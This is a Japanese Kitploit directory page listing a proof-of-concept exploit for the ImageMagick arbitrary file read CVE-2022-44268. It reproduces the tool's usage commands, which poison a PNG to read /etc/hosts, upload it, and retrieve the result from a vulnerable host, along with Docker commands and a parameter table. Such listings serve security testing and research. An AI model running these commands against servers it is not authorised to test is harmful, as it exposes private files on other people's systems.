Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-44268 — CVE-2022-44268 ImageMagick 任意ファイル読み取り - 概念実証エクスプロイト | Kitploit
ツール/GitHubGitHub/kljunowsky/cve-2022-44268
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubkljunowsky/cve-2022-44268

CVE-2022-44268

CVE-2022-44268 ImageMagick 任意ファイル読み取り - 概念実証エクスプロイト

リポジトリを見る
2782年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick 任意ファイル読み取り - 概念実証エクスプロイト

ビデオ 📼

https://youtu.be/quKxwNAMBIA

使い方 🛠

画像をポイズンする ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Upload poisoned PNG image.

エクスプロイトが成功したか確認する 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Docker での実行 🐳

ビルド

root@kitploit:~
docker build -t cve-2022-44268 .

実行

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

パラメータ 🧰

パラメータ

連絡先📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

教育目的のみであり、法律違反や個人的な利益のために使用することはできません。

このプロジェクトの作者は、このプロジェクトの資料によって引き起こされる可能性のあるいかなる損害についても責任を負いません。

詳細: https://www.metabaseq.com/imagemagick-zero-days/

ツールをダウンロード
説明
型
--urlアップロードされたPNG画像のURLString
--image入力PNGファイルFile
--output出力PNGファイルFile
--file-to-read脆弱なホストから読み取るファイルString